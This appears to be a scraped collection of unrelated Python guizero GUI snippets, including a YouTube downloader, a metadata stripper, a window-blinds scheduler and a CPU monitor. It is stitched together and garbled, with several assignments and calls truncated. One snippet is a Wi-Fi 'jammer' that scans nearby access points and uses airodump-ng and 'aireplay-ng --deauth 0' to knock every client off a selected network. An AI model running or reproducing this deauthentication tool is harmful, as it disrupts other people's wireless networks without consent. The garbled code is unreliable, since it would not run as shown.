def get_video(): link = get_link_val() try: video = YouTube(str(link)) title = video.title thumbnail_response = requests.get(video.thumbnail_url) img = quality = video.streams.filter(progressive=True) global selected_quality selected_quality = [items.resolution for items in quality] except pytube.exceptions.RegexMatchError: #global video_box video_box.width = "fill" guizero.Text(video_box, text=" ") txt = guizero.Text(video_box, text="Please enter a valid YouTube video link") except urllib.error.URLError: video_box.width = "fill" guizero.Text(video_box, text=" ") txt = guizero.Text( video_box, text="Please check your internet connection and try again") guizero.Text(video_box, text=" ") global try_again try_again = guizero.PushButton(app, text="Try again", command=start_download_thread) guizero.Text(app, text=" ") else: #global video_box picture_box = guizero.Box(video_box, align="left", width=100, height="fill") info_box = guizero.Box(video_box, align="right", width=display_width - 100, height="fill") thumbnail = guizero.Picture(picture_box, image=img, align="left", width=100, height=100) title = guizero.Text(info_box, text=title, width="fill") download_box = guizero.Box(info_box, width=75, height=50) global qualities download_btn = guizero.PushButton(download_box, text="Download", command=download_video, args=[ quality[selected_quality.index( qualities.value)], os.getcwd(), title ]) qualities = guizero.ListBox( info_box, items=[item.resolution for item in quality], width=100, height=100) loading_text.destroy()
def main(): # making entertask a global variable so we can access its value from any method global enterTask global box enterTask = guizero.TextBox(app, text="Enter a Task", width=50) guizero.Text(app, text=" ") guizero.PushButton(app, command=addTask, text="Add Task") showAll() # drawing elements in the bottom of the screen # creating a box object to align to the bottom of the screen box = guizero.Box(app, width="fill", align="bottom") guizero.PushButton(box, text="Delete All", align="right", command=deleteAll) guizero.PushButton(box, text="Delete Selected", align="right", command=removeTask) guizero.PushButton(box, text="Complete task", align="left", command=completeTask)
def main(): guizero.Text(app, text=" ") guizero.Text(app, text="Youtube Video Downloader") guizero.Text(app, text=" ") guizero.Text(app, text="Insert the video link below") guizero.Text(app, text=" ") global video_link video_link = guizero.TextBox(app, width=int(display_width * 0.1)) guizero.Text(app, text=" ") global push_btn push_btn = guizero.PushButton(app, text="Search Video", command=start_download_thread) global video_box video_box = guizero.Box(app, width=int(display_width - 100), height=100)
def photoUpload(): box1=guizero.Box(app, layout="grid") text1=guizero.Text(box1,text="Hvor mange minutter skal der filmes? ", grid=[0,0]) minutes=guizero.TextBox(box1,text="", grid=[1,0]) minutes.focus() text2=guizero.Text(box1, text="hvor mange sekunder mellem hvert billede? ",grid=[0,1]) timelapse=guizero.TextBox(box1,text="", grid=[1,1]) text3=guizero.Text(box1, text="filnavn ? ",grid=[0,2]) filename=guizero.TextBox(box1,text="", grid=[1,2]) text4=guizero.Text(box1, text=("størrelse: "),grid=[0,3]) picsize=guizero.Slider(box1, start=640, end=3280, grid=[1,3]) button1=guizero.PushButton(box1, command=lambda:printit(minutes.get(),timelapse.get(),filename.get()), text="Submit",grid=[1,5])
def open_image(): global input_box global return_box metadata = None return_box = guizero.Box(app, width="fill") try: # using PIl to open image img = # opening pyexiv2 instance from image meta = Meta(input_box.value) # opening the instance like this so that we don't close it after reading metadata so object is still in memory, although this can cause a memory leak # with Meta(input_box.value) as meta: -> using this method will delete the object and we will no longer have access to it in the clear meta function metadata = meta.read_exif() message = guizero.Text(return_box, text="") thumbnail = guizero.Picture(return_box, image=img, width=100, height=100) message = guizero.Text(return_box, text="") if not metadata: # picture has no metadata listbox = guizero.ListBox(return_box, items=["No metadata was extracted"], width="fill", height=50) else: listbox = guizero.ListBox(return_box, items=[], width="fill") cancel = guizero.PushButton(buttons_box, text="Strip Metadata", align="right", command=clear_meta, args=[meta]) for _ in metadata.items(): # add each item in metadata to listbox listbox.append(f"{_[0]}: {_[1]}") except FileNotFoundError: message = guizero.Text(return_box, text="") thumbnail = guizero.Picture(return_box, image=f'error.jpeg', width=200, height=200) message = guizero.Text(return_box, text="") message = guizero.Text(return_box, text="Image not found")
else: raise ValueError("speed oops " + rspeed) if rtype == 'goto target': posn = self.mfields['targetpos'].getValue() print('doit', rtype, posn, speed) self.motor.goto(targetpos=posn, speed=speed) elif rtype in ('run forward', 'run reverse'): self.motor.setspeed( speed=speed if rtype == 'run forward' else -speed) else: raise ValueError('rtype oops ' + rtype) app = gz.App(title="Motor testing") starttime = time.time() header = gz.Box(app, align='top', width='fill') elapsed = gz.Text(header, text="clock here", align='right') mpanel = gz.Box(app, align='left', layout='grid') pfields = {} for y, field in enumerate(motorfields): l = field[1](mpanel, grid=[0, y], **field[2]) pfields[field[0]] = { 'y': y, 'class': field[3], 'kwargs': field[4], } motorpan = motorPanel(motor=chipdrive.tmc5130(), gridx=1, pfields=pfields, panel=mpanel) #loglvl='rawspi'
def videoNoUpload(): pass app = guizero.App(title="Surveillance tools") menu = guizero.MenuBar(app, toplevel=["Photo", "Video"], options=[[["With upload", photo_choice], ["Without upload", photoNoUpload]], [["with upload", video_choice], ["Without upload", videoNoUpload]]]) message = guizero.Text(app, text="Hvad skal vi lave i dag?", grid=[0, 0]) blank_message = guizero.Text(app, text="") box0 = guizero.Box(app, layout="grid") box0_text0 = guizero.PushButton(box0, text="Tryk f for foto", command=photo_choice, grid=[0, 2]) box0_text1 = guizero.PushButton(box0, text="Tryk v for video", command=video_choice, grid=[0, 3]) box0_text2 = guizero.PushButton(box0, text="Tryk p for livepreview", command=preview_only, grid=[0, 4]) box1 = guizero.Box(app, layout="grid") box1.hide()
for i in data: file.write(i) file.close if deletedfiles ==[]: report.append('⮚ No old file deleted') else: report.append('⮚ All old files deleted') except: report.append("⮚ ERROR IN DELETING FILES") app = gz.App(title="PizzaDeleter")'pizzicon.ico') deletebar = gz.Box(app, width="fill", height=25) filebutton = gz.PushButton(deletebar, text="File", align="left", height="fill", command=filebutton) filebox = gz.TextBox(deletebar, align="left", width="fill", height="fill") deletebutton = gz.PushButton(deletebar, text="DELETE", align="right", height="fill", command=movefolder) report = gz.TextBox(app, text="⮚ Deleting older than 48 hours", width="fill", height="fill", multiline=True, scrollbar=True) deleteold() report.append('⮚ Select a file and click on DELETE') app.display() zipfiler.zipper()
Run = False stop.disable() start.enable() # most important function def Ukonci_meranie(): exit() # collect data pack it and send it away def Read_Send(): if Run: msg = "cpu:"+str(int(psutil.cpu_percent())) UDPClientSocket.sendto(msg.encode(), serverAddressPort) # let's build the gui aplikacia = guizero.App(title="Meranie CPU na dialku") okienko = guizero.Box(aplikacia, layout = "grid") start = guizero.PushButton(okienko, command=Start_meranie, text = "Start", grid = [0,0]) stop = guizero.PushButton(okienko, command=Stop_meranie, text = "Stop", grid = [1,0]) koniec = guizero.PushButton(okienko, command=Ukonci_meranie, text = "Koniec", grid = [2,0]) stop.disable() # main loop try: UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM) aplikacia.repeat(400, Read_Send) aplikacia.display() except KeyboardInterrupt: pass
from tkinter import * from tkinter import filedialog import guizero from PIL import ImageTk, Image import os from pyexiv2 import Image as Meta # setting global varialbes input_box = None thumbnail = None listbox = None return_box = None # creating app window and box widget app = guizero.App(title="Metas-Strip") buttons_box = guizero.Box(app, width="fill", align="bottom") # about function def about(): pass # function to clear screen def clear_all(): global return_box # destroy return box and all items in it return_box.destroy()
def main(): guizero_app = guizero.App( title="Window blinds automatic opener & closer", width=500, height=700) vertical_spacer(guizero_app, 10) pin_window_blinds_direction = 12 # GPIO pin 12 == Raspberry Pi pin 32 pin_window_blinds_pwm = 16 # GPIO pin 16 == Raspberry Pi pin 36 window_blinds = WindowBlinds( guizero_app, pin_window_blinds_direction, pin_window_blinds_pwm) pin_neopixel = board.D18 # GPIO pin 18 == Raspberry Pi pin 12 led_count = 35 maximum_duty_cycle = 5 # limit the led brightness neopixel_ring_clock = NeopixelRingClock(pin_neopixel, led_count, maximum_duty_cycle) neopixel_ring_clock.update() datetime_daily_alarm_close = None datetime_daily_alarm_open = None datetime_one_time_alarm_open = None vertical_spacer(guizero_app, 10) box_brightness = guizero.Box(guizero_app, width="fill") box_brightness.set_border(1, "#aaaaaa") guizero.Text(box_brightness, text="LED brightness").tk.configure( font=("Liberation Sans", 12, "bold")) def handle_brightness_changed(): neopixel_ring_clock.max_brightness = int(slider_brightness.value) neopixel_ring_clock.update() slider_brightness = guizero.Slider(box_brightness, start=0, end=255, command=handle_brightness_changed, width="fill") slider_brightness.value = maximum_duty_cycle vertical_spacer(guizero_app, 40) ######################################################################## #################### Create GUI for daily alarm ######################## ######################################################################## box_daily_alarm = guizero.Box(guizero_app, width="fill") box_daily_alarm.set_border(1, "#aaaaaa") guizero.Text(box_daily_alarm, text="Daily alarm").tk.configure( font=("Liberation Sans", 12, "bold")) vertical_spacer(box_daily_alarm, 10) # Duration before sunrise to close the blinds box_close_blinds_time = guizero.Box(box_daily_alarm) guizero.Text(box_close_blinds_time, text="Close the blinds ", align="left") textbox_duration_before_sunrise = guizero.TextBox(box_close_blinds_time, align="left", text="1 hour") guizero.Text(box_close_blinds_time, text=" before sunrise.", align="left") # What time to open the blinds afterwards box_open_blinds_time = guizero.Box(box_daily_alarm) guizero.Text( box_open_blinds_time, text="Then, open the blinds at ", align="left") textbox_open_blinds_time = guizero.TextBox(box_open_blinds_time, text="11 AM", align="left") guizero.Text(box_open_blinds_time, text=".", align="left") text_daily_alarm_status = guizero.Text(box_daily_alarm, text="Click the button below to set the daily alarm.") vertical_spacer(box_daily_alarm, 10) text_daily_alarm_status2 = guizero.Text(box_daily_alarm, text="Second line of status") vertical_spacer(box_daily_alarm, 10) text_daily_alarm_status3 = guizero.Text(box_daily_alarm, text="Third line of status") def set_daily_alarm(for_date=None): # Close the blinds a user-specified amount of time before sunrise. # Open the blinds at a user specified absolute time. # Coordinates for the City of Santa Clara, California sun = suntime.Sun(37.354444, -121.969167) if for_date is None: # If the date to get the sunrise for isn't speficied, # schedule the blinds to open for the next future sunrise. datetime_now = date_today = is_pm = datetime_now.hour > 11 if is_pm: # Sunrise is always in the AM. If the current time is PM, # schedule the blinds to open for tomorrow's sunrise. date_tomorrow = date_today + timedelta(days=1) datetime_sunrise = sun.get_sunrise_time( date_tomorrow).astimezone() else: # Check if sunrise already happened datetime_sunrise_today = sun.get_sunrise_time( date_today).astimezone() if datetime_sunrise_today <= datetime_now: # Sunrise already happened today. Schedule the blinds # to open for tomorrow's sunrise. date_tomorrow = date_today + timedelta(days=1) datetime_sunrise = sun.get_sunrise_time( date_tomorrow).astimezone() else: # sunrise is in the future today datetime_sunrise = datetime_sunrise_today else: # Use the date given in the keywork argument. datetime_sunrise = sun.get_sunrise_time(for_date).astimezone() nonlocal datetime_daily_alarm_close seconds_before_sunrise = Duration( textbox_duration_before_sunrise.value).to_seconds() datetime_daily_alarm_close = (datetime_sunrise - timedelta(seconds=seconds_before_sunrise)).astimezone() # When to open the blinds - get an absolute time from user. datetime_parsed_open_at = dateparser.parse( textbox_open_blinds_time.value).astimezone() nonlocal datetime_daily_alarm_open if datetime_parsed_open_at is None: text_daily_alarm_status.text_color = "red" text_daily_alarm_status.value = "Couldn't parse date from string" datetime_daily_alarm_open = None return datetime_daily_alarm_open = datetime.combine(, datetime_parsed_open_at.time()).astimezone() if datetime_daily_alarm_open <= datetime_daily_alarm_close: text_daily_alarm_status.text_color = "red" text_daily_alarm_status.value = \ "Trying to set blinds to open before they close:" + \ "\ndatetime_daily_alarm_open = " + \ datetime_daily_alarm_open.strftime(DATETIME_FORMAT_STRING) + \ "\ndatetime_daily_alarm_close = " + \ datetime_daily_alarm_close.strftime(DATETIME_FORMAT_STRING) datetime_daily_alarm_open = None return neopixel_ring_clock.put_alarm_region("daily", datetime_daily_alarm_close, datetime_daily_alarm_open) text_daily_alarm_status.text_color = "black" text_daily_alarm_status.value = \ "\nSunrise is:\n" + \ datetime_sunrise.strftime(DATETIME_FORMAT_STRING) + \ "\n\nClose blinds at:\n" + \ datetime_daily_alarm_close.strftime(DATETIME_FORMAT_STRING) + \ "\n\nThen open blinds at:\n" + \ datetime_daily_alarm_open.strftime(DATETIME_FORMAT_STRING) guizero.PushButton(box_daily_alarm, text="Update daily alarm", command=set_daily_alarm) vertical_spacer(guizero_app, 40) ################################################################# ################## Create gui for a one-time alarm ############## ################################################################# box_one_time_alarm = guizero.Box(guizero_app, width="fill") box_one_time_alarm.set_border(1, "#aaaaaa") guizero.Text(box_one_time_alarm, text="One-time alarm").tk.configure(font=("Liberation Sans", 12, "bold")) vertical_spacer(box_one_time_alarm, 10) box_one_time_alarm_time = guizero.Box(box_one_time_alarm) guizero.Text(box_one_time_alarm_time, text="Close blinds now, then open blinds ", align="left") textbox_one_time_alarm = guizero.TextBox(box_one_time_alarm_time, text="in 20 seconds", align="left", width=20) guizero.Text(box_one_time_alarm_time, text=".", align="left") text_one_time_alarm_status = guizero.Text(box_one_time_alarm, text="Click the button below to set a one-time alarm.") def set_one_time_alarm(): datetime_parsed = dateparser.parse(textbox_one_time_alarm.value) \ .astimezone() datetime_now = nonlocal datetime_one_time_alarm_open if datetime_parsed is None: text_one_time_alarm_status.text_color = "red" text_one_time_alarm_status.value = \ "Couldn't parse date from string" datetime_one_time_alarm_open = None return total_seconds = (datetime_parsed - datetime_now).total_seconds() if total_seconds < 1: text_one_time_alarm_status.text_color = "red" text_one_time_alarm_status.value = \ "Can't set alarm to ring in the past" datetime_one_time_alarm_open = None return if total_seconds >= 60 * 60 * 24: text_one_time_alarm_status.text_color = "red" text_one_time_alarm_status.value = "Setting alarm to ring " + \ "more than one day in the future is not supported" datetime_one_time_alarm_open = None return datetime_one_time_alarm_open = datetime_parsed # Starts the blinds closing, returns immediately, does not block. window_blinds.go_to_closed() neopixel_ring_clock.put_alarm_region("one-time", datetime_now, datetime_one_time_alarm_open) text_one_time_alarm_status.text_color = "black" text_one_time_alarm_status.value = "Submitted" guizero.PushButton(box_one_time_alarm, text="Set one-time alarm", command=set_one_time_alarm) def tick(): datetime_now = nonlocal datetime_one_time_alarm_open nonlocal datetime_daily_alarm_close nonlocal datetime_daily_alarm_open if datetime_daily_alarm_close is not None: timedelta_to_daily_alarm_close = \ datetime_daily_alarm_close - datetime_now total_seconds = timedelta_to_daily_alarm_close.total_seconds() #print(f"total_seconds until daily alarm close: {total_seconds}") if total_seconds > 0: hours, minutes, seconds = \ timedelta_split(timedelta_to_daily_alarm_close) text_daily_alarm_status2.value = \ f"Blinds will close in {hours} hr {minutes} min {seconds} sec" else: #print("which is leq zero, so I am closing the blinds") text_daily_alarm_status2.value = \ f"Blinds closed at\n{datetime_now.strftime(DATETIME_FORMAT_STRING)}." datetime_daily_alarm_close = None window_blinds.go_to_closed() if datetime_daily_alarm_open is not None: timedelta_to_daily_alarm_open = \ datetime_daily_alarm_open - datetime_now total_seconds = timedelta_to_daily_alarm_open.total_seconds() #print(f"total_seconds until daily alarm open: {total_seconds}") if total_seconds > 0: hours, minutes, seconds = \ timedelta_split(timedelta_to_daily_alarm_open) text_daily_alarm_status3.value = \ f"Blinds will open in {hours} hr {minutes} min {seconds} sec" else: #print(" which is leq zero, so I am opening the blinds") text_daily_alarm_status3.value = \ f"Blinds opened at\n{datetime_now.strftime(DATETIME_FORMAT_STRING)}." datetime_daily_alarm_open = None window_blinds.go_to_open() date_tomorrow = + timedelta(days=1) set_daily_alarm(date_tomorrow) if datetime_one_time_alarm_open is not None: timedelta_to_one_time_alarm_open = \ datetime_one_time_alarm_open - datetime_now total_seconds = timedelta_to_one_time_alarm_open.total_seconds() if total_seconds > 0: hours, minutes, seconds = \ timedelta_split(timedelta_to_one_time_alarm_open) text_one_time_alarm_status.value = f"One-time alarm will ring in {hours} hr {minutes} min {seconds} sec" else: text_one_time_alarm_status.value = f"One-time alarm rang at\n{datetime_now.strftime(DATETIME_FORMAT_STRING)}." datetime_one_time_alarm_open = None neopixel_ring_clock.remove_alarm_region("one-time") window_blinds.go_to_open() neopixel_ring_clock.update() set_daily_alarm() guizero_app.repeat(1000, tick) guizero_app.display() # blocks until the guizero window is closed window_blinds.stop() neopixel_ring_clock.all_off()
def vertical_spacer(parent, height): guizero.Box(parent, height=str(height))
def gui(): def monitor(): #gets status info related to monitoring mode status_list.append(start_adapter(interface_name))'entered function monitor') def list_APs(): wifi_list.clear() #gets list of nearby APs nearby_APs = locate_APs(interface_in_monitor_mode) for AP in nearby_APs: AP_name = AP[0] wifi_list.append(AP_name) def network_reset(): #resets the network adapter to its original state messages = stop_adapter(interface_in_monitor_mode) for message in messages: status_list.append(message) def change_selected_ssid(value): #displays the selected AP in the textbox text_box_ssid.value = value def disrupt_AP():'disrupt ap button clicked') essid = text_box_ssid.value essid = essid.lstrip(' ') essid = essid.rstrip(' ') #disrupts the selected wireless_AP desired_router = " ""routers found are:-") router_found = 0 for router in wireless_APs:[0]) essid1 = str(router[0]) essid1 = essid1.lstrip(' ') essid1 = essid1.rstrip(' ') channel1 = str(router[1]) bssid1 = str(router[2])'essid1 = '+ essid1)'essid = ' + essid) if essid == essid1: router_found = 1"desired router located") desired_router = router print(router) status_list.append(("Locking %s communicating on channel %s with BSSID %s " %(desired_router[0],desired_router[1],desired_router[2]))) break if router_found == 0: status_list.append(("Error!! : Could not find wireless AP with ESSID %s"%(essid))) + "is chosen to be jammed") else:"locking airodump onto given ap") command = "xterm -geometry -500+100 -T 'locking channel " + desired_router[1] + "' -e ' timeout 5 airodump-ng --bssid " + desired_router[2] + " -c " + desired_router[1] + " " + interface_in_monitor_mode + " '" os.system(command) status_list.append("target locked successfullly") status_list.append("deauthenticating all clients from the AP (press ctrl + C to exit)") command = "xterm -geometry -500+100 -T 'deauthenticating all users from " + desired_router[0] + " (press ctrl+c to stop)' -e 'aireplay-ng --deauth 0 -a " + desired_router[2] + " " + interface_in_monitor_mode + " '" os.system(command)"\n deauthenticating all clients") jammer = g.App(title = title, width = window_width, height = window_height, layout = "grid" ) info_box = g.Box( jammer, width = 'fill', grid = [0,0], ) text1 = g.Text( jammer, text = "Wireless AP's in the nearby area are -", size = "12", color = "black", bg = None, font = None, grid = [0,0], align = "left", width = 'fill', height = None, ) text2 = g.Text( jammer, text = "Info -", size = "12", color = "black", bg = None, font = None, grid = [1,0], align = "left", width = 'fill', height = None, ) #wifi ap listbox wifi_list = g.ListBox( jammer, grid = [0,1], align = l_align, scrollbar = l_scrollbar, height = l_height, items = ["No nearby AP's found"], width = l_width, command = change_selected_ssid, ) #status listbox status_list = g.ListBox( jammer, grid = [1,1], align = "left", scrollbar = "True", height = "200", items = ["System Initialized"], width = "300", ) #A box widget that holds all buttons button_box = g.Box( jammer, width="fill", grid = [0,3], ) #StartScan PushButton exit_button = g.PushButton( button_box, command = change_selected_ssid, text = "Scan", align = "left", ) #Network Reset PushButton network_reset = g.PushButton( button_box, command = network_reset, text = "Reset Network Adapter", align = "left", ) #Exit PushButton exit_button = g.PushButton( button_box, command = exit, text = "Exit", align = "left", ) #A box widget that holds selected ap selected_box = g.Box( jammer, width="fill", grid = [0,4], border = True, ) text = g.Text( selected_box, text="Selected wireless AP is", align="left",) text_box_ssid = g.TextBox( selected_box, text="No Wireless AP Selected", align="left", width = 'fill', ) Disrupt = g.PushButton( selected_box, text="Disrupt", command=disrupt_AP, align="left", ) status_list.after(100,monitor) wifi_list.after(100,list_APs) jammer.display()
username = username_entry_textbox.value graph_name = graph_name_combo.value graph_url = f'{username}/graphs/{graph_name}.html' webbrowser.open_new(graph_url) def change_to_custom(): """Changes the date option radio button selection to 'custom.'""" date_option_button_list = date_option.children date_option_button_list[1] # Widgets ----- # # Header Box header_box = gui.Box(app, grid=[0, 0, 3, 1], width=510, height=80) header_sub_box = gui.Box(header_box) pixela_logo = gui.Picture(header_sub_box, image='images/PIXELA_RED.png', width=60, height=60, align='left') header_text = gui.Text(header_sub_box, text='Habit Tracker', align='right', size=48) # # Graph Properties Box graph_properties_box = gui.Box(app, grid=[0, 1, 3, 1],
def count(): pass # number_of_chars.value = "Number of Chars: " + str(len(tweet.value) - 1) def count_tweets(): num = (math.ceil((len(tweet.value) - 1) / 250)) number_of_tweets.value = "Number of Tweets: " + str(num) if __name__ == '__main__': app = guizero.App() title_box = guizero.Box(app, align='top') # title box title = guizero.Text(title_box, "Send a Tweet!", align='top') # # read from file or show key # choose_key_area = guizero.Box(app, visible=True) # choose_insert_key = guizero.PushButton(choose_key_area, text="Insert Key", align="left", command=insert_selected) # choose_import_key = guizero.PushButton(choose_key_area, text="Import Key", align="right", command=import_selected) # # # one line: insert key, button # api_key_line = guizero.Box(title_box, visible=False) # # list_of_keys_area = guizero.Box(title_box, visible=False,) #